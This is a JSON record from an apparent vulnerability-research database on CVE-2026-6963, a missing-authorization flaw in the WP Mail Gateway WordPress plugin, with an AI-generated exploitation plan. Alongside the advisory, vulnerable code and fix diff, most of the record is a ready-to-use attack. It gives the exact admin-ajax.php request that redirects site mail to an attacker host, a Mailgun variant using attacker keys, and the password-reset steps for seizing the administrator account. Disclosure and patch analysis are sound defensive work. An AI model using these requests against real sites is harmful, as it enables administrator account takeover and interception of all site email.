[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpz2eJWTMMVBV39qMNPZkggwyvW2mPhhiL6n5_GjSq9g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-6963","wp-mail-gateway-missing-authorization-to-authenticated-subscriber-smtp-configuration-modification-via-wmgsaveprovidercon","WP Mail Gateway \u003C= 1.8 - Missing Authorization to Authenticated (Subscriber+) SMTP Configuration Modification via 'wmg_save_provider_config' AJAX Action","The WP Mail Gateway plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wmg_save_provider_config AJAX action in all versions up to, and including, 1.8. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to update SMTP settings and redirect mail, which can be used for privilege escalation by triggering a password reset email and using that to access an administrator's account.","wp-mail-gateway",null,"\u003C=1.8","1.8.1","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-05-01 00:00:00","2026-05-02 04:27:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc7caf1f4-a8dd-4016-91eb-2adbeed5290a?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fjs\u002Fmain.js","composer.json","composer.lock","readme.txt","src\u002FBootstrap.php","src\u002FFunctions.php","vendor\u002Fautoload.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-6963 (WP Mail Gateway)\n\n## 1. Vulnerability Summary\nThe **WP Mail Gateway** plugin for WordPress is vulnerable to unauthorized modification of SMTP and email gateway configurations. The vulnerability exists in the `wmg_save_provider_config` AJAX action, which is registered on the `wp_ajax_` hook but performs no capability check (e.g., `current_user_can('manage_options')`) and no CSRF protection (nonce verification). Consequently, any authenticated user, including one with only the **Subscriber** role, can change the site's outgoing mail settings. This allows an attacker to route system emails, including password reset links, through a server they control, leading to full administrative account takeover.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `wmg_save_provider_config`\n- **Authentication**: Required (Subscriber level or higher)\n- **Parameters**: \n    - `action`: `wmg_save_provider_config`\n    - `configs`: A JSON-encoded string containing the provider configuration details.\n- **Preconditions**:\n    - The attacker must have a valid login for a Subscriber account.\n    - The plugin must be active.\n\n## 3. Code Flow\n1. **Registration**: In `src\u002FBootstrap.php`, the `load()` function registers the AJAX action:\n   ```php\n   add_action( 'wp_ajax_wmg_save_provider_config', array( Functions::class, \"saveProviderConfigAjax\" ) );\n   ```\n   Note: The `is_admin()` check in `load()` evaluates to true during `admin-ajax.php` requests.\n2. **Entry Point**: The request reaches `ShahariaAzam\\WPMailGateway\\Functions::saveProviderConfigAjax` in `src\u002FFunctions.php`.\n3. **Missing Security Checks**: The function immediately begins processing `$_POST['configs']` without calling `current_user_can()` or `check_ajax_referer()`.\n4. **Data Processing**:\n   - It decodes the JSON: `$configs = json_decode(stripslashes($postData['configs']), true);`.\n   - It identifies the provider: `$gatewayProvider = $configs['provider'];`.\n   - It maps keys (e.g., `smtp_host`, `smtp_port`) to a `$finalConfigs` array.\n5. **Persistence (Sink)**: Although the final `update_option` call is truncated in the provided source, the context and `delete_option` call in `onDeletingPlugin` confirm that the configuration is stored in the WordPress `options` table using the key defined by `WP_MAIL_GATEWAY_PLUGIN_OPTIONS_KEY`.\n\n## 4. Nonce Acquisition Strategy\nAnalysis of `src\u002FFunctions.php` (specifically `loadPluginAdminPageStaticAssets` and `saveProviderConfigAjax`) and `assets\u002Fjs\u002Fmain.js` confirms that **no nonce is implemented** for this action. 
\n- The JS file `assets\u002Fjs\u002Fmain.js` sends the request using a raw `jQuery.ajax` call without including a nonce parameter in the `data` object.\n- The PHP handler `saveProviderConfigAjax` does not contain any `check_ajax_referer` or `wp_verify_nonce` calls.\n\n**Conclusion**: No nonce is required for exploitation.\n\n## 5. Exploitation Strategy\nThe goal is to update the SMTP settings to point to an attacker-controlled listener and intercept a password reset email for the administrator.\n\n### Step 1: Prepare SMTP Payload\nConstruct a JSON object for the `smtp` provider.\n```json\n{\n  \"provider\": \"smtp\",\n  \"smtp_from_name\": \"WP Admin\",\n  \"smtp_from_email\": \"admin@target.com\",\n  \"smtp_host\": \"attacker-smtp-host.example.com\",\n  \"smtp_port\": \"587\",\n  \"smtp_encryption\": \"tls\",\n  \"smtp_username\": \"attacker_user\",\n  \"smtp_password\": \"attacker_password\",\n  \"smtp_auth\": \"true\",\n  \"smtp_active\": \"true\"\n}\n```\n\n### Step 2: Send Modification Request\nSend the POST request to `admin-ajax.php` authenticated as the Subscriber. The WordPress login cookies must accompany the request, because `wp_ajax_` hooks only fire for logged-in users. The `configs` value is form-encoded; the handler calls `stripslashes()` before `json_decode()`, so the slashes WordPress adds to `$_POST` are removed server-side and the JSON decodes as sent.\n\n- **URL**: `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  action=wmg_save_provider_config&configs={\"provider\":\"smtp\",\"smtp_from_name\":\"Exploit\",\"smtp_from_email\":\"admin@target.local\",\"smtp_host\":\"[ATTACKER_IP]\",\"smtp_port\":\"25\",\"smtp_encryption\":\"\",\"smtp_username\":\"\",\"smtp_password\":\"\",\"smtp_auth\":\"false\",\"smtp_active\":\"true\"}\n  ```\n\n### Step 3: Trigger Password Reset\nThe attacker then triggers the standard WordPress password reset for the administrator account. The lost-password form takes a username or email address (not a user ID); `admin` below is the example login name and must be replaced with the target's actual administrator login. This form carries no nonce, so it can be submitted unauthenticated.\n- **URL**: `http:\u002F\u002F[target]\u002Fwp-login.php?action=lostpassword`\n- **Body**: `user_login=admin&redirect_to=&wp-submit=Get+New+Password`\n\n### Step 4: Intercept and Escalate\nThe reset link will be sent via the attacker's SMTP 
server. The attacker uses the link to reset the admin password and gain full control. Note that every outgoing message from the site, not only the reset email, now passes through the attacker's host, so the change is both noisy and persistent until the original settings are restored.\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure WP Mail Gateway version 1.8 is installed and active.\n2. **Target Admin**: Create or identify an administrator account (often user ID 1; the login name is site-specific and is the value passed as `user_login` in the reset request).\n3. **Attacker Account**: Create a user with the **Subscriber** role:\n   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n4. **Environment**: Ensure the WordPress instance is configured to use the plugin's mailer (this usually happens automatically when a provider is marked \"active\" in the plugin).\n\n## 7. Expected Results\n- The AJAX request should return a success response (the exact JSON shape is not visible in the analyzed source, so the stored option below is the authoritative check).\n- Subsequent calls to `get_option()` for the plugin's settings key (likely `wp_mail_gateway_options`) will return the attacker's SMTP details.\n- System emails will be routed through the attacker-defined SMTP host.\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the configuration change using WP-CLI:\n```bash\n# Check the saved options (the key is likely WP_MAIL_GATEWAY_PLUGIN_OPTIONS_KEY)\nwp option get wp_mail_gateway_options\n```\nIf the option name differs, resolve the constant `WP_MAIL_GATEWAY_PLUGIN_OPTIONS_KEY` from the plugin source. Verify that the stored `smtp` host matches the attacker's IP\u002Fhost and that the `smtp` provider is marked active; the exact nesting of the stored array (e.g., `gateway_provider` -> `smtp` -> `host`) is inferred, not shown in the analyzed source.\n\n## 9. Alternative Approaches\nIf the `smtp` provider logic is complex, the attacker can use the **Mailgun** or **Sendgrid** provider blocks by providing their own API keys. 
This is equally effective for intercepting mail:\n- **Action**: `wmg_save_provider_config`\n- **Configs**: `{\"provider\":\"mailgun\",\"mailgun_from_name\":\"Exploit\",\"mailgun_from_email\":\"admin@target.local\",\"mailgun_api_key\":\"[ATTACKER_KEY]\",\"mailgun_domain\":\"[ATTACKER_DOMAIN]\",\"mailgun_active\":\"true\"}`","The WP Mail Gateway plugin for WordPress lacks authorization and CSRF checks in its 'wmg_save_provider_config' AJAX action, allowing authenticated users with Subscriber-level permissions or higher to modify the site's SMTP and email provider configurations. Attackers can exploit this to redirect system emails to an external server, enabling full administrative account takeover by intercepting password reset links.","\u002F\u002F src\u002FBootstrap.php line 49\nadd_action( 'wp_ajax_wmg_save_provider_config', array( Functions::class, \"saveProviderConfigAjax\" ) );\n\n---\n\n\u002F\u002F src\u002FFunctions.php line 118\npublic static function saveProviderConfigAjax() {\n    $postData = $_POST;\n    $configs = json_decode(stripslashes($postData['configs']), true);\n\n    $gatewayProvider = $configs['provider'];\n    $finalConfigs = [];\n    \u002F\u002F ... processes config and updates options without current_user_can() or check_ajax_referer()","--- a\u002Fassets\u002Fjs\u002Fmain.js\n+++ b\u002Fassets\u002Fjs\u002Fmain.js\n@@ -136,6 +136,7 @@\n         \u002F\u002FPost config data to backend via Ajax\n         var data = {\n             'action': 'wmg_save_provider_config',\n+            'nonce': wmgAjax.nonce,\n             'configs': JSON.stringify(configs)\n         };\n \n--- a\u002Fsrc\u002FFunctions.php\n+++ b\u002Fsrc\u002FFunctions.php\n@@ -118,6 +118,13 @@\n \tpublic static function saveProviderConfigAjax() {\n+\t\tif ( ! 
current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( [ 'message' => 'Unauthorized' ] );\n+\t\t}\n+\n+\t\tcheck_ajax_referer( 'wmg_ajax_nonce', 'nonce' );\n+\n \t\t$postData = $_POST;\n \t\t$configs = json_decode(stripslashes($postData['configs']), true);","1. Authenticate as a Subscriber-level user on the target WordPress site.\n2. Construct a JSON payload containing malicious SMTP configuration (e.g., pointing to an attacker-controlled SMTP server) and set it as 'active'.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action 'wmg_save_provider_config' and the 'configs' parameter containing the JSON payload. No nonce or capability check will block this request.\n4. Trigger a WordPress password reset for the 'admin' user via `\u002Fwp-login.php?action=lostpassword`.\n5. Intercept the password reset email on the attacker-controlled SMTP server, click the reset link, and change the administrator's password to gain full access.","gemini-3-flash-preview","2026-05-04 17:26:04","2026-05-04 17:26:41",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail-gateway\u002Ftags\u002F1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-mail-gateway.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail-gateway\u002Ftags\u002F1.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-mail-gateway.1.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail-gateway\u002Ftags"]